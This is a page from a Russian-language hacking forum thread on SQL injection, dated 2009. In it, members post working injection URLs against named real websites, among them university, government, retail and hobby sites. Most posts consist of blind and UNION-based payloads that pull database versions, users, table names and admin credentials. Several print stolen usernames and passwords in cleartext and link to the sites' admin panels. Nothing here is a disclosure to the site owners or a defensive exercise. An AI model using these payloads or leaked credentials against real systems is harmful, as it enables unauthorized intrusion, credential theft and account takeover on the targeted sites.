HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 780 из 1602 « Первая < 280680730770 776 777 778 779 780 781 782 783 784 7908308801280 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.02.2009, 00:36
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
По умолчанию
www.drumspeech.com известный сайт барабанщиков=)

таблица с юзерами:

Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),1,1))=117 u
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),2,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),3,1))=101 e
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),4,1))=114 r
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),5,1))=0
колонка с паролями:
Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),1, 1))=112 p
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),2, 1))=97 a
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),3, 1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),4, 1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),5, 1))=119 w
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),6, 1))=100 d
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),7, 1))=0
колонка с логинами:
Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),1, 1))=108 l
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),2, 1))=111 o
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),3, 1))=103 g
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),4, 1))=105 i
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),5, 1))=110 n
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),6, 1))=0
админ:
Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),1,1))=11 9 w
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),2,1))=10 1 e
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),3,1))=98 b
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),4,1))=10 0 d
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),5,1))=11 1 o
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),6,1))=10 3 g
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),7,1))=0
его пароль:
Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),1,1))=1 22 z
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),2,1))=9 7 a
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),3,1))=1 10 n
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),4,1))=1 17 u
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),5,1))=1 15 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),6,1))=1 15 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),7,1))=1 05 i
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),8,1))=0
drumnet.ru Ещё один известный сайт барабанщиков)
Цитата:
http://drumnet.ru/viewevent.php?id_pub=-99999+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5,6+--+
юзер - z49030_drumnet@77.221.130.14
бд - z49030_drumnet
версия MySQL - 5.0.51a-12-log
 
Ответить с цитированием

  #2  
Старый 21.02.2009, 08:46
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572

Репутация: 34
По умолчанию
carc.jo pr 6

Код HTML:
http://www.carc.jo/pages_en.php?type=page&id=-1+union+select+concat_ws(0x3a3a,version(),database(),user())

5.0.67-community-log::carcgov_marka::carcgov_marka@localhost

http://carc.jo/admin/ - админка basic
shonenjump.com pr 5

Код HTML:
http://www.shonenjump.com/news/contest/winners/index.php?id=-5+union+select+concat_ws(0x3a3a,version(),database(),user()),2,3,4,5

5.0.45-Debian_1ubuntu3.4-log::sj_cms::shonenjump@vpersuadertron
 
Ответить с цитированием

  #3  
Старый 21.02.2009, 09:12
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию
Сеть информационно-платежных киосков "Мгновенно"

Код:
http://www.mgnoveno.ru/index.php?p=news&act=more&news_id=102+and+ascii(substring((select+1+from+user+limit+1),1,1))%3E1--
 
Ответить с цитированием

  #4  
Старый 21.02.2009, 10:34
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
http://www.ic-computers.ro/content/html/index.php?a=show_prod&pid=256+AND+ASCII(SUBSTRING( (select+version()),1,1))=37--




Version : 5.0.67-community
Database : iccomput_iccomputers
User : iccomput_iccomputers@localhost
 
Ответить с цитированием

  #5  
Старый 21.02.2009, 12:57
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
athabascau.ca - PR7
Код:
http://www.athabascau.ca/aboutau/news/news_item.php?id=319%27+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
DB_Ver:5.0.45
DB_User:wiu_webuser@localhost
DB:db_wiu
В принципе есть таблица news_login с полями id,username,password вот пример запроса:
Код:
http://www.athabascau.ca/aboutau/news/news_item.php?id=319%27+UNION+SELECT+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+FROM+news_login/*
И собственно вот ид,логин и пароль
0:admin:ccsadmin108
но где это использовать неизвестно =)
 
Ответить с цитированием

  #6  
Старый 21.02.2009, 13:25
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
По умолчанию
Код:
http://www.wedasoft.at/en/promos.php?id=-9+union+select+1,2,3,4,5,6,7,8
.....
Последний раз редактировалось jokester; 21.02.2009 в 17:42.. Причина: Обычная эо скуля, читай маны
 
Ответить с цитированием

  #7  
Старый 21.02.2009, 14:33
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
omnibc.ca - PR5
Код:
http://www.omnibc.ca/programming/details.php?id=999999%27+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6/*
DB_Ver: 5.0.45
DB_User: omnibc@localhost
DB: omnibc_08_2008
админка:
Код:
http://www.omnibc.ca/admin/
Теперь выясним пароль и логин доступа к админке... Впрочем это не трудно... Таблица с админами называется user а поля id,username,password,role... нам интересны второе и третье, то есть username и password
Код:
http://www.omnibc.ca/programming/details.php?id=999999%27+UNION+SELECT+concat_ws(0x3a,username,password),2,3,4,5,6+FROM+user+LIMIT+0,1/*
Всего 4 пользователя с просто потрясными паролями =) сначала думал что шутка =)
james:jamespass
user:userpass
news:newspass
community:communitypass
 
Ответить с цитированием

  #8  
Старый 21.02.2009, 16:35
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию
http://www.fire.nsw.gov.au/news.php?news=837+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12+limit+1,1/*

DB_Ver: 4.0.24-nt-max-log
DB_User: vs161854_1@wic036p.server-web.com
DB: vs161854_1
 
Ответить с цитированием

  #9  
Старый 21.02.2009, 19:27
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
judoontario.ca - PR5
Код:
http://www.judoontario.ca/current_news.php?id=656565%27+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4/*
DB_Ver:4.1.20
DB_User:judo1@localhost
DB:judo
Теперь выясним имена пользователей и их пароли =) Таблица называется members! Поля username,password
Код:
http://www.judoontario.ca/current_news.php?id=656565%27+UNION+SELECT+1,2,concat_ws(0x3a,username,password),4+from+members/*
выводятся все =)
 
Ответить с цитированием

  #10  
Старый 21.02.2009, 20:42
Glazz
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332

Репутация: 15
По умолчанию
http://psy-trening.com/reply.php?id=-1+union+select+1,2,3,4,5,6--
Может будет интересно.
 
Ответить с цитированием
Ответ
Страница 780 из 1602 « Первая < 280680730770 776 777 778 779 780 781 782 783 784 7908308801280 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.